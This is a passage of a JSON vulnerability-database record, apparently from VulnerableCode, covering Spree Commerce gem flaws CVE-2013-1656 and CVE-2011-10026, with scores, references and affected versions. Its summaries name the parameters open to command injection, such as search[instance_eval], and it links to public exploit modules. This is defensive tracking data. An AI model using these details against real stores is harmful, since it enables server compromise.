"https://nvd.nist.gov/vuln/detail/CVE-2013-2506", "reference_id": "CVE-2013-2506", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-2506" }, { "reference_url": "https://github.com/advisories/GHSA-jp57-9j37-5476", "reference_id": "GHSA-jp57-9j37-5476", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jp57-9j37-5476" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/158197?format=api", "purl": "pkg:gem/spree@1.2.0.rc1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" }, { "vulnerability": "VCID-t9gu-2vs3-g7cu" }, { "vulnerability": "VCID-y37s-b27m-n7ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.2.0.rc1" }, { "url": "http://public2.vulnerablecode.io/api/packages/158199?format=api", "purl": "pkg:gem/spree@1.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" }, { "vulnerability": "VCID-t9gu-2vs3-g7cu" }, { "vulnerability": "VCID-y37s-b27m-n7ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.2.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/158205?format=api", "purl": "pkg:gem/spree@1.3.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" }, { "vulnerability": "VCID-t9gu-2vs3-g7cu" }, { "vulnerability": "VCID-y37s-b27m-n7ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.3.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/51427?format=api", "purl": "pkg:gem/spree@3.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@3.0.5" } ], "aliases": [ "CVE-2013-2506", "GHSA-jp57-9j37-5476", "OSV-90865" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t9gu-2vs3-g7cu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37504?format=api", "vulnerability_id": "VCID-y37s-b27m-n7ad", "summary": "Authenticated administrators to execute arbitrary commands\nSpree Commerce allow remote authenticated administrators to instantiate arbitrary Ruby objects and execute arbitrary commands via the (1) payment_method parameter to core/app/controllers/spree/admin/payment_methods_controller.rb; and the (2) promotion_action parameter to promotion_actions_controller.rb, (3) promotion_rule parameter to promotion_rules_controller.rb, and (4) calculator_type parameter to promotions_controller.rb in promo/app/controllers/spree/admin/, related to unsafe use of the constantize function.", "references": [ { "reference_url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1656", "reference_id": "", "reference_type": "", "scores": [], "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1656" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2013-1656", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00305", "scoring_system": "epss", "scoring_elements": "0.541", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00305", "scoring_system": "epss", "scoring_elements": "0.54074", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00305", "scoring_system": "epss", "scoring_elements": "0.54097", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00305", "scoring_system": "epss", "scoring_elements": "0.54043", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00305", "scoring_system": "epss", "scoring_elements": "0.54108", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2013-1656" }, { "reference_url": "https://blog.convisoappsec.com/en/spree-commerce-multiple-unsafe-reflection-vulnerabilities-cve-2013-1656", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://blog.convisoappsec.com/en/spree-commerce-multiple-unsafe-reflection-vulnerabilities-cve-2013-1656" }, { "reference_url": "https://github.com/advisories/GHSA-jxx8-v83v-rhw3", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jxx8-v83v-rhw3" }, { "reference_url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2013-1656.yml", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2013-1656.yml" }, { "reference_url": "https://github.com/spree/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree" }, { "reference_url": "https://github.com/spree/spree/commit/70092eb55b8be8fe5d21a7658b62da658612fba7", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/commit/70092eb55b8be8fe5d21a7658b62da658612fba7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1656", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1656" }, { "reference_url": "https://web.archive.org/web/20130907044454/https://www.conviso.com.br/advisories/CVE-2013-1656.txt", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://web.archive.org/web/20130907044454/https://www.conviso.com.br/advisories/CVE-2013-1656.txt" }, { "reference_url": "https://web.archive.org/web/20140329142330/http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://web.archive.org/web/20140329142330/http://spreecommerce.com/blog/multiple-security-vulnerabilities-fixed" }, { "reference_url": "https://web.archive.org/web/20140618100330/http://blog.conviso.com.br/2013/03/spree-commerce-multiple-unsafe.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://web.archive.org/web/20140618100330/http://blog.conviso.com.br/2013/03/spree-commerce-multiple-unsafe.html" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/51421?format=api", "purl": "pkg:gem/spree@1.3.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" }, { "vulnerability": "VCID-y37s-b27m-n7ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@1.3.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/120517?format=api", "purl": "pkg:gem/spree@2.0.0.rc1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.0.0.rc1" }, { "url": "http://public2.vulnerablecode.io/api/packages/51422?format=api", "purl": "pkg:gem/spree@2.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@2.0.0" } ], "aliases": [ "CVE-2013-1656", "GHSA-jxx8-v83v-rhw3" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y37s-b27m-n7ad" } ], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/51436?format=api", "vulnerability_id": "VCID-w5fg-qcqv-uugu", "summary": "Spree Commerce is vulnerable to RCE through Search API\nSpreecommerce versions prior to 0.50.x contain a remote command\nexecution vulnerability in the API's search functionality. Improper\ninput sanitation allows attackers to inject arbitrary shell commands\nvia the search[instance_eval] parameter, which is dynamically invoked\nusing Ruby’s send method. This flaw enables unauthenticated attackers\nto execute commands on the server.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2011-10026", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.68643", "scoring_system": "epss", "scoring_elements": "0.98637", "published_at": "2026-06-09T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2011-10026" }, { "reference_url": "https://github.com/advisories/GHSA-x485-rhg3-cqr4", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x485-rhg3-cqr4" }, { "reference_url": "https://github.com/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/" } ], "url": "https://github.com/spree" }, { "reference_url": "https://github.com/spree/spree", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree" }, { "reference_url": "https://github.com/spree/spree/commit/0a9a360c590829d8a377ceae0cf997bbbbcc2df4", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/commit/0a9a360c590829d8a377ceae0cf997bbbbcc2df4" }, { "reference_url": "https://github.com/spree/spree/commit/3b559e7219f3681184be409ad00cd34a34a37978", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/spree/spree/commit/3b559e7219f3681184be409ad00cd34a34a37978" }, { "reference_url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_searchlogic_exec.rb", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/" } ], "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/spree_searchlogic_exec.rb" }, { "reference_url": "https://web.archive.org/web/20111120023342/http://spreecommerce.com/blog/2011/04/19/security-fixes", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/" } ], "url": "https://web.archive.org/web/20111120023342/http://spreecommerce.com/blog/2011/04/19/security-fixes" }, { "reference_url": "https://www.exploit-db.com/exploits/17199", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/" } ], "url": "https://www.exploit-db.com/exploits/17199" }, { "reference_url": "https://www.vulncheck.com/advisories/spreecommerce-api-rce", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-20T18:45:19Z/" } ], "url": "https://www.vulncheck.com/advisories/spreecommerce-api-rce" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2011-10026", "reference_id": "CVE-2011-10026", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-10026" }, { "reference_url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rd_searchlogic/CVE-2011-10026.yml", "reference_id": "CVE-2011-10026.YML", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rd_searchlogic/CVE-2011-10026.yml" }, { "reference_url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10026.yml", "reference_id": "CVE-2011-10026.YML", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree/CVE-2011-10026.yml" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/86146?format=api", "purl": "pkg:gem/spree@0.50.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-153y-kwk2-xyfd" }, { "vulnerability": "VCID-7jum-4ny7-xuhy" }, { "vulnerability": "VCID-cwh1-mmky-ukcx" }, { "vulnerability": "VCID-s4mu-v75h-dfep" }, { "vulnerability": "VCID-t9gu-2vs3-g7cu" }, { "vulnerability": "VCID-y37s-b27m-n7ad" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.50.0" } ], "aliases": [ "CVE-2011-10026", "GHSA-x485-rhg3-cqr4" ], "risk_score": 10.0, "exploitability": "2.0", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w5fg-qcqv-uugu" } ], "risk_score": "10.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:gem/spree@0.50.0" }